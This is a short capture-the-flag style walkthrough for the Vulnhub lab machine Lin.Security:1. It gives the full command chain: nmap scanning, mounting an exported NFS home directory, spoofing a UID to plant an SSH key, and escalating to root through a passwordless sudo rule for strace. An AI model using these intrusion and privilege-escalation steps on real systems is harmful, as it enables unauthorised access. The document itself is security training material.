Today, We will root Lin.Security:1 Machine from Vulnhub. This is a simple and straight forward boot2root machine.
Lets start by finding the IP.
[email protected]:~# nmap -sS 192.168.18.0/24
Got the IP and open ports.

NFS is running on port 2019. Lets enumerate it.
[email protected]:~# nmap -sV --script=nfs-* 192.168.18.102

We can mount /home/peter
to our machine.
[email protected]:/mnt# mkdir lin
[email protected]:/mnt# mount 192.168.18.102:/home/peter /mnt/lin
[email protected]:/mnt# ls -la

In order to login to the machine, we can place our ssh public key in .ssh
directory
(refer this article to learn how to create an ssh key)
Copy our public key (id_rsa.pub) to /tmp directory.
[email protected]:/mnt# cd /root/.ssh
[email protected]:~/.ssh# ls -la
total 20
drw------- 2 root root 4096 Jul 2 07:25 .
drwx------ 35 root root 4096 Aug 17 07:17 ..
-rw------- 1 root root 2590 Aug 12 08:35 id_rsa
-rw-r--r-- 1 root root 563 Aug 12 08:35 id_rsa.pub
-rw-r--r-- 1 root root 3322 Aug 13 06:47 known_hosts
[email protected]:~/.ssh# cp id_rsa.pub /tmp
make a directory named .ssh
in the directory we just mounted.
[email protected]:/mnt/lin# mkdir .ssh
mkdir: cannot create directory ‘.ssh’: Permission denied
We dont have the permission to create the directory.
Lets create a user with uid 1001 to do this.
[email protected]:~# useradd -u 1001 peter
Now change the ownwership of /tmp/id_rsa.pub
to peter
[email protected]:~/.ssh# cd /tmp
[email protected]:/tmp# chown peter:peter id_rsa.pub
[email protected]:/tmp#
Lets copy the file to the mounted directory now. First lets change the user to peter
and copy the file.
[email protected]:/mnt/lin# su peter
$ whoami
peter
$ mkdir .ssh
$ cd .ssh
$ cp /tmp/id_rsa.pub authorized_keys
We have copied our public key file to /tmp/.ssh/authorized_keys

Now, Let’s try to login as peter through ssh.
[email protected]:~# cd .ssh
[email protected]:~/.ssh# ssh [email protected]

We are now logged in as peter. Lets see what all we can do here as a privileged user.
[email protected]:~$ sudo -l
Matching Defaults entries for peter on linsecurity:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User peter may run the following commands on linsecurity:
(ALL) NOPASSWD: /usr/bin/strace
We can run /usr/bin/strace
as root.
Can we escalate our privileges with this?
Lets try.
[email protected]:~$ sudo strace -o /dev/null /bin/sh
# whoami
root
We got the root!
This was a comparitively easier machine. Lets root another machine next day!